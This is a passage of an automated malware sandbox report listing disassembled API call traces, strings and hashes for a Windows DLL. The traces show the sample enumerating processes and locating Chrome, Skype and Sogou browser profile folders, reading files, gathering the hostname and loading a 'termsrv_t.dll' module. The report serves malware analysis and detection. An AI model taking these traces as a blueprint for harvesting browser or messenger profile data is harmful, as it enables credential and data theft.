                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F25F
                                                  • #540.MFC42 ref: 1000F269
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F29B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F2ED
                                                  • #800.MFC42 ref: 1000F301
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
                                                  • API String ID: 1983172782-2055279553
                                                  • Opcode ID: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                  • Instruction ID: 7d35013b61d80cf1e9c1dfe39d441eecd520366740e00716b73819efa327f1aa
                                                  • Opcode Fuzzy Hash: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                  • Instruction Fuzzy Hash: F6218779408788ABE354DB54DD42FDBB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000EE07
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EE1F
                                                  • #540.MFC42 ref: 1000EE29
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EE5B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE73
                                                  • #800.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE84
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE8E
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000EEAD
                                                  • #800.MFC42 ref: 1000EEC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                  • API String ID: 1983172782-2559963756
                                                  • Opcode ID: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                  • Instruction ID: 8c6a82a66adb9de8b1ca2427e2dad7b5aad7125b1f470a43c445caaf05036487
                                                  • Opcode Fuzzy Hash: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                  • Instruction Fuzzy Hash: 1D216579408784ABE254DB54DD46FDEB7D5EB84700F40891CF19D821D6EB74A504CBA3
                                                  APIs
                                                  • #537.MFC42(Skype.exe), ref: 1000EF07
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EF1F
                                                  • #540.MFC42 ref: 1000EF29
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EF5B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF73
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF84
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF8E
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000EFAD
                                                  • #800.MFC42 ref: 1000EFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                  • API String ID: 1983172782-3499480952
                                                  • Opcode ID: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                  • Instruction ID: c2392c766fec2091ac0e11c8610587f68406746635502bb5fb4463dc87aa9c62
                                                  • Opcode Fuzzy Hash: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                  • Instruction Fuzzy Hash: 0B216579408788ABE254DB54D942FDEB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$#825$Object$CursorDestroyRelease
                                                  • String ID:
                                                  • API String ID: 719826280-0
                                                  • Opcode ID: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                  • Instruction ID: 1057cd0b5374723fdd9eac028f866a029913c2518dbccd866ad41eb7240ccfe0
                                                  • Opcode Fuzzy Hash: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                  • Instruction Fuzzy Hash: 83114FBA600B149BD620EBB9DC80D57F3EDFF98210B154D1DFA8A87750DAB5F8448B60
                                                  APIs
                                                  • malloc.MSVCRT ref: 10007519
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10007541
                                                  • free.MSVCRT ref: 1000759F
                                                  • GetFileAttributesA.KERNEL32(?), ref: 100075AD
                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 100075D4
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 100075E3
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 100075F9
                                                  • ReadFile.KERNEL32(?,00000000,?,0000035D,00000000), ref: 1000761D
                                                  • CloseHandle.KERNEL32(?), ref: 1000762A
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 1000766A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Virtual$AllocAttributesCloseCreateFolderFreeHandlePathReadSizeSpecialfreemalloc
                                                  • String ID: Main
                                                  • API String ID: 2820283417-521822810
                                                  • Opcode ID: 0d2ed056cb78a8a469271724d1c264386961660cb201d27e300a745632f92d49
                                                  • Instruction ID: 161e36ac445db4a724d0f3a7fb22858f178d9a0769fada5ae3fd82864674448d
                                                  • Opcode Fuzzy Hash: 0d2ed056cb78a8a469271724d1c264386961660cb201d27e300a745632f92d49
                                                  • Instruction Fuzzy Hash: 5E51E8756002005BE718DB388C99FA73699FB84720F184739FE1ADB2D5DE79A904C764
                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A98A
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9C4
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9D4
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9E4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9EB
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A9F8
                                                  • gethostname.WS2_32(?,?), ref: 1001AA00
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001AA07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrlen$#823$AddressCloseCreateHandleLibraryLoadProcReadSizegethostname
                                                  • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                  • API String ID: 1105965372-3579490797
                                                  • Opcode ID: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                  • Instruction ID: 1aca79b18ebe77987ab2057df5d6393e57785d9c54ea4be51680de8087f9014e
                                                  • Opcode Fuzzy Hash: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                  • Instruction Fuzzy Hash: B331D675604754AFE320CB28CC90FEB7799FB89340F040929FA49A7290DA316945CF62
                                                  APIs
                                                  • wsprintfA.USER32 ref: 10026D35
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026D4B
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026D5E
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 10026D6B
                                                  • GetFileAttributesA.KERNEL32(?), ref: 10026D7B
                                                  • LoadLibraryA.KERNEL32(?), ref: 10026D8E
                                                  • lstrlenA.KERNEL32(?,?,?,75570F00), ref: 10026DA9
                                                  • lstrlenA.KERNEL32(?,?,75570F00), ref: 10026DC9
                                                  • LocalReAlloc.KERNEL32(00000000,00000003,00000042,?,75570F00), ref: 10026DD3
                                                  • LocalFree.KERNEL32(00000000,?,75570F00), ref: 10026DE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloclstrlen$AttributesDirectoryFileFreeLibraryLoadSystemlstrcatwsprintf
                                                  • String ID: \termsrv_t.dll
                                                  • API String ID: 2807520882-1337493607
                                                  • Opcode ID: 83a4be9771d83eee3d19b33fbd7ca9d9f5fde24c43fc361349bad1d2511fc240
                                                  • Instruction ID: a7eecf74c6d42d9f50bdf01c0ac0242f7398daee99183518acfba9189af43730
                                                  • Opcode Fuzzy Hash: 83a4be9771d83eee3d19b33fbd7ca9d9f5fde24c43fc361349bad1d2511fc240
                                                  • Instruction Fuzzy Hash: 6721D176100306AFD724DB60DC88EEB77A8FB85710F444A18FA4A97191EB70E509CB62
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: inet_ntoa$htons$inet_addr
                                                  • String ID:
                                                  • API String ID: 2325850693-0
                                                  • Opcode ID: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                  • Instruction ID: 0f8a403a37a04198fb3543f642c4371480fab305af7d543d8c9d6285c61f0e9b
